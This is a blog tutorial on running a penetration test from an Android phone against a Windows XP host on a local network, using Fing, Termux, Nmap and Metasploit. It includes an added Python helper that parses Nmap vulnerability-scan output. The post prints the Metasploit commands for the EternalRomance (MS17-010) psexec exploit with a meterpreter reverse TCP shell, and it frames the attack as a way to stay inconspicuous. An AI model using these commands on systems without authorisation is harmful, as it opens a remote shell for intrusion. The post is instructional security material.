See If You Can Find It

Monday, June 15, 2020

Exploit from your phone!

Hey everyone! Hopefully you've been able to avoid the stereotypical dredge of Monday. If not, maybe you'll enjoy what I have for you today!

For all of you penetration testers out there (or those aspiring to be one), most of the time you want to be as discreet as possible, right? Unless you're performing your engagement in a coffee shop or somewhere else where having your laptop out is the norm, you usually have to wait until after hours to do a lot of the technical work (or have a pretty powerful antenna to connect to their wireless environment). Well, today we're going to talk about a way you can look like everyone else while engaging your environment. For this attack, we're using an old Windows XP machine (you'd be surprised at how many people still use it, Vladimir Putin does) and a Samsung Galaxy S9. The tools used are: Fing, Termux, Nmap, and Metasploit.



RECON

First, we need to do a scan of the network to find the host IP that we're going to be attacking. For this we're using Fing (check out my previous post HERE if you want to know how to use Fing).

VULNERABILITY IDENTIFICATION

We see there is a host named WinXP at IP 192.168.1.143. Now that we've identified this information, we should scan it with Nmap to see what services are running and whether there are any easy-to-find vulnerabilities on this system. We're going to do this simple scan by opening up Termux and typing in "nmap -vv -Pn --script vuln 192.168.1.143".
Here we see that this host is vulnerable to CVE-2017-0143 (Eternal Romance).
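As an added example (not part of the original post), here is a small Python triage helper that reads the normal-format output of the "--script vuln" scan above and keeps only the scripts that report a VULNERABLE state, together with their CVE ids, so you don't have to eyeball a long scan report. The sample output it runs on is constructed to mirror the scan of 192.168.1.143 described here, not captured from that machine.

```python
import re
from typing import Dict, List

# Constructed sample modelled on "nmap --script vuln" normal output (not a real capture).
SAMPLE_OUTPUT = """\
Nmap scan report for 192.168.1.143
Host is up (0.0012s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|     References:
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
"""

# A script result starts with "| name:" or "|_name:" (at most one space after the bar),
# which keeps indented detail lines such as "|     State:" or "|       https://" from matching.
SCRIPT_START = re.compile(r"^\|_?\s?([a-z][a-z0-9-]*):\s*(.*)$")
HOST_LINE = re.compile(r"^Nmap scan report for (\S+)")
CVE_TOKEN = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_vuln_output(text: str) -> Dict[str, Dict[str, List[str]]]:
    """Return {host: {script_name: [CVE ids]}} for every script block whose
    State is VULNERABLE; scripts that report false or an error are dropped."""
    findings: Dict[str, Dict[str, List[str]]] = {}
    host = script = None
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if m:
            host = m.group(1)
            findings.setdefault(host, {})
            script = None
            continue
        m = SCRIPT_START.match(line)
        if m:
            script = m.group(1)
            continue
        if host is None or script is None or not line.startswith("|"):
            continue
        body = line.lstrip("|_ ").strip()
        if body.startswith("State:") and "VULNERABLE" in body:
            findings[host].setdefault(script, [])
        elif body.startswith("IDs:") and script in findings[host]:
            findings[host][script].extend(CVE_TOKEN.findall(body))
    return findings


if __name__ == "__main__":
    for host, scripts in parse_vuln_output(SAMPLE_OUTPUT).items():
        for name, cves in scripts.items():
            print(host, name, ", ".join(cves) or "(no CVE listed)")
```

Pipe a saved scan (nmap -oN) into parse_vuln_output to get the same per-host summary for a larger sweep.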

EXPLOITATION

Now we're going to launch Metasploit using "msfconsole" so that we can get our exploit going.

From here we need to load our exploit, set a payload to use, and specify the IP addresses of the attacking device as well as the victim. Here's what I entered:
"use exploit/windows/smb/ms17_010_psexec"

"set payload windows/meterpreter/reverse_tcp"

"set lhost 192.168.1.137"

"set rhost 192.168.1.143"

Now that this is done, we're ready to exploit!

Success! Now we'll use a couple of commands to verify info about the machine we're on.

There we have it! Just like you were right at your computer, but for all anyone around would know, you're just scrolling through social media on your phone. Now, you may notice that my keyboard is different from the standard Samsung keyboard. That's because for a while now there has been a bug in the Samsung keyboard that causes typed letters not to show up in certain fields (Termux and Spotify are the two biggest problems with this). Here I'm using "Hacker's Keyboard" from the NetHunter Store.
